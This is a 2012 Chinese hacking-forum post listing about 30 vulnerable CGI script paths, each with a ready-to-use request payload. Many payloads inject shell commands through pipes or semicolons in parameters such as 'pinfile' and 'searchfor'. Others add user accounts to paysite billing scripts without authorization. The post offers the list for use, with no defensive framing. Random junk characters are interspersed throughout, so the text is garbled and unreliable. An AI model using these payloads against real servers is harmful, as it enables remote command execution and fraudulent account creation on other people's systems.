中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞+使用方法 [打印本页]

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞+使用方法
==============================, E$ k5 E" l5 Z9 ]
6 R; f6 [8 l' w. K4 ]
/smspass.pl  O/ g5 M) V1 Z+ o$ \# w; f
username=username&password=password# I4 x9 i2 M# Y/ K
, U3 f  h: i% B
/index.cgi
( b& ~5 u5 q$ g& Swei=ren&gen=command
9 e8 F' D5 s7 Z! y$ T
1 S- V4 `7 i6 t1 ?8 W4 z6 l2 @/passmaster.cgi# v4 V" z8 j4 O1 b, g
Action=Add&Username=Username&Password=Password! J  l; B* c1 u4 n

% G' F4 H; _7 A( t9 c' v/accountcreate.cgi
6 M+ A2 f0 C6 j# o  _username=username&password=password&ref1=|echo;ls|, o/ d7 C: |' E3 C& |3 W$ n- K

7 b$ X+ r3 Z: i8 v/form.cgi% Q) i( g; O; O- X6 E
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
7 F2 l1 F. U5 s. {* {$ y6 b! @2 c, `+ P) K; K- J0 N
/addusr.pl
+ Y5 |0 a5 `6 M! @: R+ _1 m" C6 g$ }/cgi-bin/EuroDebit/addusr.pl
3 P& x9 Q/ @3 t) G7 }6 A+ q7 z' muser=username&pass=Password&confirm=Password
, ^7 s0 E6 g; G( r6 l' u( s4 I' b1 Z, H: U4 {' N
/ccbill-local.asp: U' H/ d" l: o3 A( a
post_values=username:password' ^6 }& L( r1 V- I9 o$ |

. @2 v+ F/ f8 f8 ^6 r& N9 r  e/count.cgi
6 H/ I0 `& u6 u; xpinfile=|echo;ls -la;exit|
8 q. W% t2 I' s
' u. Y* W" Z* a9 K/recon.cgi# y: o5 `- h$ l. R8 V% A5 V
/recon.cgi?search" ~/ r) Z* {. T' H. s; I* r5 @+ f
searchoption=1&searchfor=|echo;ls -al;exit|5 r# W6 r$ U. P

$ G3 Z# }: I8 i0 Q/verotelrum.pl4 W. U7 Z' R* t* s' m
vercode=username:password:dseegsow:add:amount<&30>
" X" R5 B5 t% A' b
: i% k8 c5 U0 J0 J4 Z  U7 R! R/af.cgi% a! z5 [) d: P+ v0 \) q9 x9 |
_browser_out=|echo;ls -la;exit;|! `3 s, t) Z0 F
" q2 K. r/ y4 V& V6 k6 I% H0 m1 }
/modify.cgi
4 c& _& G8 l% d5 l4 Fusername=username&password=password&expire=30# U8 W8 t3 s" d. i& O

2 R% g2 C# S) w4 a# S9 u/openjournal.cgi& w! G7 Q+ l5 v! h
edit=1&ct=2&go=|echo;ls -al;exit|3 O/ D2 T5 z: r5 ]9 s
/ c* X$ o" b" ~. H& V
/gx9passwd.cgi
& n# r4 T# T2 M& Y, Q. fcmd=ADD&user=username&pass=password
) s/ C" _' F3 k6 R9 T) ~* N
$ m; u( s  o! H! r, F* I: `% Y. U7 l/probecontrol.cgi
% `4 f: N# |" p* |4 g  }% ycommand=enable&username=username&password=password, Q; u0 ~( L% z  {8 `+ z

+ L) s. z6 W8 A/recon.cgi! \1 J. q- e2 n' ~, O. z2 H0 U
searchoption=3&searchfor=echo;ls -la;exit
& z9 {4 \& `8 q9 f+ b+ e2 ]8 D* M9 D4 ^( ^& b: w0 ]
/htadd.pl
3 P9 {8 t" l5 N( ~configfile=|echo; ls -alt; exit
& d7 x* n, u9 j2 O$ `
5 M: g; g5 S# w% ^/gx9passwd.cgi
* Y- a  f9 Q1 k( k, Acmd=ADD&user=username&pass=password
. @" N6 ~, L0 v! v6 t/ J% h$ s  F; B
/ibill*.pl
9 ^$ o7 W! r& x9 q0 w  [+ Ireqtype=add&authpwd=authpwd&username=username&password=password; D) `4 }* Z7 ~4 a6 Y5 Z7 r4 P) M0 S
/ R  o" J8 W: y2 K: V
/cpay.cgi, v1 k. b1 z$ J6 t
command=add_member&username=username(EMAIL)&password=password(DES). r+ I/ m9 \' M" L, Z; G+ J# a. z
- r" y  n1 E: p
/globill_ut.cgi
1 e6 q9 C" R+ c6 i! L( [3 cdo=add&username=username&password=password&wpassword=password0 d) I& O9 J. c* n, T& K5 g. z
- @# _. o; ~0 e$ i
/usercontrol.cgi. l$ e6 c9 C; R
command=enable&username=USER&password=PASS3 V/ G3 j3 N- F
# q9 @% T0 p: x& I7 ?
/globoSALErum.cgi
  d2 Q* z) f  Naction=ADD&seccode=seccode&login=username&password=password8 r  g) G! V. o3 a

2 L9 X* A3 Y( K/ g' n) e/addusr.pl
- w7 @' @" A/ N8 yuser=USER&pass=PASS&confirm=PASS
$ h+ \  p8 l+ i+ A; @6 T
" K0 r' H" F/ U) `/pincount.cgi- [/ E0 j, l6 _* F4 Z0 y. v" I% F5 ^
/cgi-bin/mastergate/pincount.cgi
) E- I5 {* k8 f" X1 Q* q. Tpinfile=|echo;pwd;exit|7 B; v' J7 Z2 G4 A7 T

8 R1 t' d! w7 [* `* |' r/accountcreate.cgi
% V6 l6 z' d5 R: D: d/cgi-bin/gateway/accountcreate.cgi+ P% f& u* L& u
username=username&password=password&password2=password&ref1=|echo;ls -al;exit2 e  I! o" v% E& k. V

7 e4 \! ^, F; b2 F) P7 f2 k. N/af.cgi
6 L2 H3 b1 M, U9 W) C: H; X/env.cgi  F% A8 ~) i8 J
ADD+;echo;pwd;exit1 c! W: o9 b! q6 Y( b8 l
1 J, k6 i" ~- J
/count.cgi* L' g( y$ {0 w' E4 L
pinfile=|echo;pwd;exit|* c# |4 }( G/ l* ]

6 L( ^* l) l5 @7 `5 i  P3 n/recon.cgi/ F& d! B' Z% J1 A
searchoption=1&searchfor=|echo;ls%20-al;exit|
0 t# D5 E8 h" s* C4 Z( ~
" n7 l0 M6 s6 }/add.cgi4 l1 k4 o0 ]# Y2 }: ?1 O
username=username&password=password&expire=30% L0 d* x, j4 K8 I5 e  E

- C0 ?) J+ H. g3 [( E) Z/ G==============================
9 f9 ~0 l/ X% @0 L  b- w  {+ b9 t




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2